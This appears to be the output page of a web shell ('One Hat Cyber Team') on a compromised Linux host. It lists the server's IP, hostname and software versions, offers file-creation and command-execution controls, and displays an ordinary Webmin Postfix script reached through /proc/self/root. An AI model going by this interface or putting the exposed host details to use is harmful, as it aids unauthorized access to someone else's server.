⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
webmin
/
postfix
/
View File Name :
save_opts.cgi
#!/usr/bin/perl # # postfix-module by Guillaume Cottenceau
, # for webmin by Jamie Cameron # # Save Postfix options require './postfix-lib.pl'; &ReadParse(); $access{'general'} || &error($text{'opts_ecannot'}); &error_setup($text{'opts_err'}); if (defined($in{"debug_peer_level_def"})) { $in{"debug_peer_level_def"} =~ /^[1-9]\d*$/ || &error($text{'opts_edebug'}); } if (defined($in{"inet_protocols"})) { &set_current_value("inet_protocols", $in{"inet_protocols"} || "__DEFAULT_VALUE_IE_NOT_IN_CONFIG_FILE__", 1); } &lock_postfix_files(); &save_options(\%in); &unlock_postfix_files(); $err = &reload_postfix(); &error($err) if ($err); &webmin_log($in{'_log_form'} || "opts"); &redirect("");